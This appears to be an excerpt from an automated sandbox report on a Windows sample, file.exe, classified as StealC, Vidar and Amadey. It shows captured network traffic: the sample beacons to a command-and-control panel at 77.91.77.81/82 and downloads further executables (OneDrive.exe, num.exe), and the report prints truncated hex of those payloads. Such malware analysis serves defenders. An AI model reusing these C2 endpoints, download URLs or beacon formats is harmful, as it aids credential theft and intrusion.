Jul 24, 2024 02:40:24.922298908 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Tue, 23 Jul 2024 00:48:10 GMT Age: 85934 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Jul 24, 2024 02:40:34.931353092 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 24, 2024 02:40:45.025269985 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 24, 2024 02:40:55.040237904 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 24, 2024 02:41:05.055912971 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 24, 2024 02:41:15.082907915 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 24, 2024 02:41:25.192078114 CEST	6	OUT	Data Raw: 00 Data Ascii:

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 02:39:53.558006048 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Jul 24, 2024 02:39:54.034447908 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Tue, 23 Jul 2024 09:32:16 GMT Age: 54457 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jul 24, 2024 02:39:54.053611994 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Jul 24, 2024 02:39:54.154861927 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Tue, 23 Jul 2024 09:32:16 GMT Age: 54458 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jul 24, 2024 02:40:04.163718939 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 24, 2024 02:40:14.184326887 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 24, 2024 02:40:23.527394056 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Jul 24, 2024 02:40:23.628252983 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Tue, 23 Jul 2024 09:32:16 GMT Age: 54487 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jul 24, 2024 02:40:33.637031078 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 24, 2024 02:40:43.671029091 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 24, 2024 02:40:53.679049015 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 24, 2024 02:41:03.690249920 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 24, 2024 02:41:13.722503901 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 24, 2024 02:41:23.802983046 CEST	6	OUT	Data Raw: 00 Data Ascii:

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\CFCBFHJECAKEHIECGIEBAFIEBA

C:\ProgramData\DBKFIDAA

C:\ProgramData\FBFCAKKK

C:\ProgramData\GIIIECBGDHJJKFIDAKJDHJJKEB

C:\ProgramData\HJJEGIEHIJKKFIDHDGID

Windows Analysis Report
file.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 02:40:05.202235937 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 24, 2024 02:40:05.927845001 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Jul 2024 00:40:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 24, 2024 02:40:05.935149908 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 45 34 31 43 46 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CEFBAE41CFFCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 24, 2024 02:40:06.162827969 CEST	315	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Jul 2024 00:40:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 64 0d 0a 20 3c 63 3e 31 30 30 30 33 34 33 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 35 39 34 35 62 36 37 65 65 38 33 30 39 65 33 31 33 63 32 36 38 39 61 61 31 61 66 65 62 33 37 66 39 65 35 62 37 62 35 34 33 36 37 65 62 61 39 36 65 37 63 36 31 63 62 33 31 62 63 35 34 64 39 39 64 37 62 62 35 38 39 61 63 62 38 31 33 38 32 61 65 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7d <c>1000343001+++aa0ed36554e19fbffd5744f5945b67ee8309e313c2689aa1afeb37f9e5b7b54367eba96e7c61cb31bc54d99d7bb589acb81382ae#<d>0

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 02:40:05.360496998 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 24, 2024 02:40:06.044326067 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Jul 2024 00:40:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 24, 2024 02:40:06.044989109 CEST	303	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 24, 2024 02:40:06.266222000 CEST	361	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Jul 2024 00:40:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 61 62 0d 0a 20 3c 63 3e 31 30 30 30 30 31 39 30 33 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 62 30 64 35 64 61 32 63 38 35 30 36 37 33 62 35 64 37 36 61 63 31 63 66 38 64 37 63 32 62 33 61 34 66 63 61 31 63 36 33 31 39 37 35 39 34 39 23 31 30 30 30 30 32 31 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 64 34 34 62 35 63 30 34 66 37 65 33 62 34 34 36 30 61 35 30 32 62 34 63 62 63 35 61 32 65 61 66 65 62 37 38 34 36 64 39 33 34 66 34 38 62 31 35 65 61 61 34 39 35 63 34 39 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: ab <c>1000019031+++b5937c1a99d5f9db0d5da2c850673b5d76ac1cf8d7c2b3a4fca1c631975949#1000021001+++fc8f7c1ed3c0f9c30d44b5c04f7e3b4460a502b4cbc5a2eafeb7846d934f48b15eaa495c49#<d>0

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 02:40:06.171051025 CEST	70	OUT	GET /selectex-file-host/OneDrive.exe HTTP/1.1 Host: 185.196.10.57
Jul 24, 2024 02:40:07.575480938 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Jul 2024 00:40:06 GMT Content-Type: application/octet-stream Content-Length: 12945034 Last-Modified: Tue, 23 Jul 2024 23:44:05 GMT Connection: keep-alive ETag: "66a04045-c5868a" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 e4 37 a0 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 8e 01 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 04 00 00 04 00 00 9e eb [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$XhcXhcXhc`_hcfhcgRhc[hc`QhcgIhcfphcbShcXhbhcKgAhcKaYhcRichXhcPEd7f"(@`lx+`"h@P.text `.rdataB&(@@.datas@.pdata"`$@@.rsrc+,@@.reloch@B
Jul 24, 2024 02:40:07.575503111 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 83 ec 28 e8 2f e1 00 00 8b 08 48 8b 05 ee cf 03 00 89 08 e8 27 e1 00 00 48 8b 08 48 8b 05 dd cf 03 00 48 89 48 08 48 Data Ascii: H(/H'HHHHHH($HqCH\$Hl$ LD$VWATAUAWH H3HDIHA.LHuHVHMVE3HI7yLFH
Jul 24, 2024 02:40:07.575519085 CEST	448	IN	Data Raw: 8d 15 00 a4 02 00 48 8d 0d 35 a4 02 00 e8 a4 12 00 00 e9 bb 00 00 00 8b 4e 0c e8 a7 2c 01 00 4c 8b f0 48 85 c0 75 20 44 8b 4e 0c 4c 8d 46 12 48 8d 15 20 a4 02 00 48 8d 0d 2d a2 02 00 e8 74 12 00 00 e9 8b 00 00 00 80 7e 10 01 75 13 4d 8b ce 45 33 Data Ascii: H5N,LHu DNLFH H-t~uME3HIc^Hl$@IH\|$HLd$PHt8A fDI;HMAIGHHnHrBHH+u3H\|$HHl$@Ld$PtI+E3IH\$XIH A_A^^LFH
Jul 24, 2024 02:40:07.575539112 CEST	1236	IN	Data Raw: ff ff e9 54 01 00 00 8b 57 04 45 33 c0 48 03 93 00 10 00 00 49 8b cf e8 6e e3 00 00 85 c0 79 21 4c 8d 47 12 48 8d 15 1b a2 02 00 48 8d 0d 50 a2 02 00 e8 bf 10 00 00 bb ff ff ff ff e9 12 01 00 00 80 7f 10 01 75 18 45 33 c9 4d 8b c4 48 8b d7 49 8b Data Ascii: TWE3HIny!LGHHPuE3MHI.Ll$03A Lt$(A*LHu!LGHH^Ht$XwHHl$P@ffI;HMAIGIHnHr1MA
Jul 24, 2024 02:40:07.575556040 CEST	224	IN	Data Raw: 66 90 33 c0 41 83 f8 02 7c 18 f3 0f 6f 02 66 0f 38 00 c1 f3 0f 7f 02 eb 1a 66 0f 1f 84 00 00 00 00 00 8b 0c 82 0f c9 89 0c 82 48 ff c0 48 83 f8 04 7c ef 0f b6 4a 11 8d 41 a6 a8 f7 74 13 80 f9 64 74 0e 80 f9 6e 74 09 80 f9 78 74 04 32 c0 eb 02 b0 Data Ascii: f3A\|of8fHH\|JAtdtntxt2HH;rHH$HH$H3L$I[ Ik(I_LD$LL$ SUVWH8IHl$xHH+Hl$(LL
Jul 24, 2024 02:40:07.575568914 CEST	1236	IN	Data Raw: 8b c3 48 c7 44 24 20 00 00 00 00 48 8b d7 48 8b 08 48 83 c9 02 e8 6c 20 01 00 85 c0 b9 ff ff ff ff 0f 48 c1 48 83 c4 38 5f 5e 5d 5b c3 cc cc cc cc cc 48 89 5c 24 10 48 89 6c 24 18 48 89 74 24 20 57 48 81 ec 80 02 00 00 48 8b 05 d2 c3 03 00 48 33 Data Ascii: HD$ HHHl HH8_^][H\$Hl$Ht$ WHHH3H$pHALLIHH(HD$ \|2AHDfZ 3^ Af\ HL$tfX zE3D$pL
Jul 24, 2024 02:40:07.575587034 CEST	1236	IN	Data Raw: 55 56 57 41 56 48 83 ec 50 48 8b 05 3e bf 03 00 48 33 c4 48 89 44 24 40 48 8b f1 0f b7 ea 48 8b 89 30 20 00 00 45 0f b7 f0 ff 15 ef 92 02 00 48 8b d8 48 85 c0 0f 84 90 00 00 00 0f b7 8e 58 20 00 00 33 ff 0f b7 86 5e 20 00 00 48 89 7c 24 30 89 7c Data Ascii: UVWAVHPH>H3HD$@HH0 EHHX 3^ H\|$0\|$<I+HH +L$8HtHHHV(D$ P%LL$0AHHH tHHH0 HWT$<f+T$4` D^ f;D$(fCL
Jul 24, 2024 02:40:07.575603962 CEST	448	IN	Data Raw: 00 00 00 48 8b d7 48 8b 08 48 83 c9 01 e8 20 19 01 00 85 c0 b9 ff ff ff ff 0f 48 c1 48 83 c4 38 5f 5e 5d 5b c3 cc cc cc cc cc 4c 8b dc 49 89 4b 08 49 89 53 10 4d 89 43 18 4d 89 4b 20 53 57 48 81 ec 48 0c 00 00 48 8b 05 2d ba 03 00 48 33 c4 48 89 Data Ascii: HHH HH8_^][LIKISMCMK SWHHH-H3H$0HI{H\|$(HT$0LHD$ AHHRAH$0HL$0F`3A0HtLH$0<LHT$00H$0H3HH_[
Jul 24, 2024 02:40:07.575618982 CEST	1236	IN	Data Raw: 48 33 c4 48 89 84 24 30 10 00 00 48 8b f9 e8 5b 1c 01 00 48 8d b4 24 70 10 00 00 8b 18 e8 98 e8 ff ff 4c 8b 8c 24 68 10 00 00 48 8d 94 24 30 04 00 00 48 89 74 24 28 41 b8 00 04 00 00 48 c7 44 24 20 00 00 00 00 48 8b 08 48 83 c9 02 e8 cc 14 01 00 Data Ascii: H3H$0H[H$pL$hH$0Ht$(AHD$ HHHD$(L$0LmH\|$ HL$0AH$0HL$0^3A0HtLH$0LHT$0{H$0H3H@_^[LIKI
Jul 24, 2024 02:40:07.575634956 CEST	1236	IN	Data Raw: 48 8b 05 07 11 04 00 48 8b cd ff 15 f6 87 02 00 48 8b eb 48 85 ed 74 20 48 8b 05 17 12 04 00 48 8b cd ff 15 de 87 02 00 48 85 c0 74 0b 48 8b c8 e8 85 6a 01 00 4c 8b f0 48 8b 05 cf 10 04 00 49 8b cf ff 15 be 87 02 00 48 8b 05 bf 10 04 00 48 8b cd Data Ascii: HHHHt HHHtHjLHIHHHl$`HILd$hHIH\$pIH0A_A^A]_^@VAUAWp`H+H&H3H$PH LHHkLHuH
Jul 24, 2024 02:40:07.575650930 CEST	1236	IN	Data Raw: 00 00 48 8d 4c 24 30 41 8b de e8 a3 66 02 00 49 8b bd 08 10 00 00 49 3b bd 10 10 00 00 0f 83 e8 01 00 00 4c 89 a4 24 f0 30 00 00 41 bc ff ff ff ff 48 89 b4 24 20 31 00 00 4c 89 bc 24 e0 30 00 00 90 0f b6 4f 11 8d 41 a6 a8 f7 74 17 80 f9 64 0f 84 Data Ascii: HL$0AfII;L$0AH$ 1L$0OAtdntx:HwH HtH<Ht$(L" LD$ \H$=(H$u>H HtH6H$
Jul 24, 2024 02:40:07.576066971 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Jul 2024 00:40:06 GMT Content-Type: application/octet-stream Content-Length: 12945034 Last-Modified: Tue, 23 Jul 2024 23:44:05 GMT Connection: keep-alive ETag: "66a04045-c5868a" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 e4 37 a0 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 8e 01 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 04 00 00 04 00 00 9e eb [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$XhcXhcXhc`_hcfhcgRhc[hc`QhcgIhcfphcbShcXhbhcKgAhcKaYhcRichXhcPEd7f"(@`lx+`"h@P.text `.rdataB&(@@.datas@.pdata"`$@@.rsrc+,@@.reloch@B
Jul 24, 2024 02:40:07.576472998 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Jul 2024 00:40:06 GMT Content-Type: application/octet-stream Content-Length: 12945034 Last-Modified: Tue, 23 Jul 2024 23:44:05 GMT Connection: keep-alive ETag: "66a04045-c5868a" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 e4 37 a0 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 8e 01 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 04 00 00 04 00 00 9e eb [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$XhcXhcXhc`_hcfhcgRhc[hc`QhcgIhcfphcbShcXhbhcKgAhcKaYhcRichXhcPEd7f"(@`lx+`"h@P.text `.rdataB&(@@.datas@.pdata"`$@@.rsrc+,@@.reloch@B

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 02:40:06.427372932 CEST	49	OUT	GET /cost/num.exe HTTP/1.1 Host: 77.91.77.81
Jul 24, 2024 02:40:07.576173067 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Jul 2024 00:40:07 GMT Content-Type: application/octet-stream Content-Length: 192000 Last-Modified: Mon, 22 Jul 2024 02:01:04 GMT Connection: keep-alive ETag: "669dbd60-2ee00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 50 af 9d 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 90 64 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$bu^uku_{vfz{fuZuhRichPELPfB"d@0$@<#\|$.textJ .rdata@@.data+!@.reloc*D#F@B
Jul 24, 2024 02:40:07.576188087 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 79 b9 41 00 70 c8 41 00 d9 c8 41 00 00 00 00 Data Ascii: yApAAUQEE}tMUUEEE]UEExMUMMM]UQSjh0hAj$bE
Jul 24, 2024 02:40:07.576205015 CEST	1236	IN	Data Raw: 8b 8d 10 fc ff ff 51 83 ec 0c 8b cc 8d 95 04 fc ff ff 52 e8 bb 8c 01 00 81 ec 88 00 00 00 8b cc 8d 45 08 50 e8 ca 00 00 00 8d 8d a4 fb ff ff 51 e8 9e 37 01 00 81 c4 a0 00 00 00 8d 8d a4 fb ff ff e8 ed 8c 01 00 8d 8d f8 fb ff ff e8 b2 8f 01 00 50 Data Ascii: QREPQ7PbjjRAM]UQMM\|nMHcM<XM0MM]
Jul 24, 2024 02:40:07.576220036 CEST	1236	IN	Data Raw: 35 8d 4d f4 e8 56 88 01 00 8d 4d e8 e8 4e 88 01 00 8d 4d 08 e8 46 88 01 00 8d 4d 18 e8 3e 88 01 00 8d 4d 24 e8 36 88 01 00 8d 4d 34 e8 ae fb ff ff e9 11 05 00 00 68 54 51 42 00 8d 8d cc fe ff ff 51 ff 15 98 d0 62 00 85 c0 74 16 68 fc 51 42 00 8d Data Ascii: 5MVMNMFM>M$6M4hTQBQbthQBRbu}hB(}0E$PlQhSBxRPQhLSBREPQhRBREPQ)
Jul 24, 2024 02:40:07.576236010 CEST	1236	IN	Data Raw: e8 86 83 01 00 8d 8d 94 fe ff ff e8 7b 83 01 00 8d 85 a0 fe ff ff 50 8b 4d e4 51 ff 15 a0 cf 62 00 85 c0 0f 85 39 fb ff ff 8b 55 e4 52 ff 15 18 cf 62 00 8d 4d e8 e8 90 85 01 00 8d 4d f4 e8 88 85 01 00 8d 4d f4 e8 40 83 01 00 8d 4d e8 e8 38 83 01 Data Ascii: {PMQb9URbMMM@M8M0M(M$ M4]UEEEM;UREk,T(REk,TRLEk,P5
